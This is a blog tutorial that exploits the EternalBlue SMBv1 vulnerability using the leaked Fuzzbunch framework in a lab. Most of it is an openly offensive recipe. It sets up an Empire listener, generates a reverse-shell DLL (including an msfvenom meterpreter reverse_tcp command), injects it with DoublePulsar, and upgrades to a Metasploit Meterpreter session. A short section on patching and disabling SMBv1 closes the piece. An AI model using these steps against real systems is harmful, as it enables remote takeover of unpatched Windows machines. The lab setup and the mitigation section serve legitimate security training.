Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking Tutorials on April 18, 2017 Exploit tutorials

In this tutorial we will be exploiting a SMB vulnerability using the Eternalblue exploit which is one of the exploits that was recently leaked by a group called the Shadow Brokers. Eternalblue exploits a remote code execution vulnerability in SMBv1 and NBT over TCP ports 445 and 139. At the time of writing it targets a wide range of Windows operating systems, from Windows XP up to Windows Server 2012. The currently available exploits do not target Windows 10 and Windows Server 2016 but most likely will in the near future when they are being modified.

Eternalblue is just one of the Windows exploits that was leaked to the public on Friday 14 April by the Shadow Brokers. The eternal ‘series’ cover a lot more exploits such as Eternalromance, Eternalchampion and Eternalsynergy all targeting recent Windows operating systems. To configure and execute the exploits against vulnerable targets there is an exploit framework included called Fuzzbunch. Fuzzbunch is developed in Python 2.6 and has many similarities with the Metasploit framework. In the following steps we will be installing the prerequisites, setup Fuzzbunch and learn how to execture Eternalblue against vulnerable targets. The result will be a reverse shell on a Windows 7 machine using Empire & Meterpreter .

Setting up Fuzzbunch and installing prerequisites

For testing purposes we will be using a private lab setup containing the following machines:

• Windows 7 64-bit as vulnerable host. IP: 10.11.1.253
• Windows 7 as Windows attack machine running Fuzzbunch. IP: 10.11.1.251
• Kali Linux as second attack machine running the Empire framework. IP: 10.11.1.16

Before we can start exploiting our target host in the lab network we need to install some prerequisites on our Windows 7 attack machine and the Kali Linux Machine.

Installing prerequisites on the Windows 7 machine

On the Windows 7 attack machine we need to install Python 2.6 and PyWin32 v212. The installation files can be downloaded here:
Python 2.6: https://www.python.org/download/releases/2.6/
PyWin32 v212: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
Follow the installation steps for Python first and then for PyWin32. Make sure that you install PyWin32 as administrator, otherwise you might get errors from running the post-install script. If you need to run the post-install script again, it is located in the following directory:

C: \Python26\Scripts

Installing Empire Framework on the Kali Linux machine

On the Kali Linux machine we need to install the Empire framework which is available from Github:
Empire framework: https://github.com/EmpireProject/Empire
Installing the Empire Framework on Kali Linux is very simple, just run the ./setup/install.sh script which will install some dependencies and then run ./empire to start Empire.

Empire framework

Setting up Fuzzbunch

The next step is to download the Shadow Brokers dump and unpack it to the Desktop. When you’ve downloaded the dump from Github you have to create a new folder named ‘listeningspost’ in the windows directory that contains the fb.py (Fuzzbunch) file.

Comment the listeningposts line or create a folder named listeningposts in the Fuzzbunch directory.

Finally edit the Fuzzbunch configuration file named fuzzbunch.xml and set the appropriate ResourcesDir and LogDir parameters:

Change the Fuzzbunch log and resources location parameters.

Now we can launch Fuzzbunch by executing the fb.py file from the command line and it should run without any errors:

Starting Fuzzbunch.

If you receive errors about missing DLL’s or imports, make sure that PyWin32 is correctly installed and the post-install script finished successfully.

Configuring and executing Eternalblue

Now that we have everything installed and Fuzzbunch running it requires a target and call-back IP address. The target address is the IP of the vulnerable target host which will be 10.11.1.252 (Vulnerable Windows 7 Machine) in our lab situation. The call-back IP will be the IP address of the Windows 7 attack host.

Setting the targets in Fuzzbunch.

Then we need to specify some parameters related to redirection & logging and create a new project in Fuzzbunch. We will not be using redirection so type ‘no’ and press enter to continue. Keep the logging location default by pressing enter. Then create a new project by choosing option 4 (or 0 when there are no existing projects) and name it whatever you like. Then choose to use the default logging location for your new project.

Fuzzbunch project settings.

To get an overview of the loaded plugin’s/exploit type the ‘use’ command. This will display all available plugins that Fuzzbunch loaded during startup, including Eternalblue. To select the Eternalblue plugin type the following command:

use Eternalblue

Executing Eternalblue in Fuzzbunch.

Fuzzbunch now asks us if we want to be prompted for variable settings, choose yes. Fuzzbunch will now prompt us for all variable settings. Choose the default options for all settings except for 1 option and that is the delivery mechanism option. Choose option 1 ‘FB’ as delivery mechanism:

Setting the delivery mechanism to Fuzzbunch.

Finally it will ask us if we want to execute the plugin:

Eternalblue settings.

The plugin will now execute and if everything went successfully Fuzzbunch will output that Eternalblue succeeded:

Executing the Eternalblue exploit.

Configuring Empire Listener and the reverse shell DLL

The next step is to setup a listener in Empire and generate the malicious DLL file containing the reverse shell. First we will create a listener using the following commands on the Empire command line:

listeners
set Name Eternalblue
set Host http://10.11.1.16
set Port 4444
execute

Finally you can use the list command to print the active listeners to the terminal:

Empire listener running.

Now that we have our listener setup to intercept the reverse shell all that is remaining now is to create the malicious DLL and inject it in the vulnerable Windows 7 host. Use the following commands to generate the DLL file with Empire:

usestager dll Eternalblue
set Arch x64
set OutFile /var/www/html/launcher.dll
execute

Empire framework stager dll.

The DLL file is now stored in the web root directory. To transfer the DLL to the Windows 7 attack box just start the Apache webserver with the following command:

service apache2 start

Now we can download the DLL file from the Windows 7 attack machine with a web browser. Let’s store the launcher.dll file in the windows folder.

Msfvenom malicious DLL

You can also generate the malicious DLL with msfvenom and setup a listener using the multi handler:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f dll LHOST=192.168.1.16 LPORT=4444 > /var/www/html/launcher.dll

DoublePulsar

The next step is to run DoublePulsar and inject the malicious launcher.dll file. Type the following command in Fuzzbunch to use DoublePulsar:

use DoublePulsar

DoublePulsar settings.

In our private practice lab we’re targeting a 64-bit vulnerable Windows 7 installation. In this case we need to change the default settings for the architecture to 64 bit and keep all other variables default until we reach the Function settings.

DoublePulsar specify the architecture.

Instead of the default option for the Function variable we choose to inject and run a DLL. You’ve probably guessed already that we’re injecting the malicious DLL that we’ve generated with Empire earlier. Choose option 2 from the function settings:

DoublePulsar operation mechanism DLL injection.

Then we need to enter the location of the DLL file and some other options we can leave as default.

Specify the reverse shell DLL.

Choose the default options for all other variable settings until Fuzzbunch asks us if we want to execute DoublePulsar:

Executing DoublePulsar

If all went successful the output should like as following:

DoublePulsar executed successfully.

When we switch to the Kali Linux VM running the Empire listener we should have a reverse shell from the target host which we can no interact with:

Reverse shell in Empire.

Switching from Empire to Meterpreter shell in Metasploit

Let’s see if we can switch from the Empire shell to Metasploit Meterpreter. Run the following commands to setup a listener:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 10.11.1.16
set lport 5555
run

Metasploit reverse handler is running.

Now that the multi handler is running switch back to Empire and run the following commands:

usemodule code_execution/invoke_shellcode
set Lhost 10.11.1.16
set Lport 5555
execute

Empire execute reverse shell.

When we switch back to Metasploit again we should have received a Meterpreter shell:

Meterpreter shell.

Patching and Mitigation

Eternalblue has been patched by Microsoft in March 2017. If you haven’t installed the patch it is very recommended to do so on a short term. Another effective method is to disable SMBv1 on your Windows machines.
To disable SMBv1 on Windows 8 & Windows Server 2012 open Windows Powershell and run the following command to disable SMBv1:

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Use the following command to check if SMBv1 is disabled:

Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol

SMBv1 disabled.

Run the following cmdlet in PowerShell to disable SMBv1 on Windows 7, Windows Server 2008 R2, Windows Vista, and Windows Server 2008:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB1 -Type DWORD -Value 0 -Force

Source website --> http://www.hackingtutorials.org/exploit-tutorials/exploiting-eternalblue-for-shell-with-empire-msfconsole/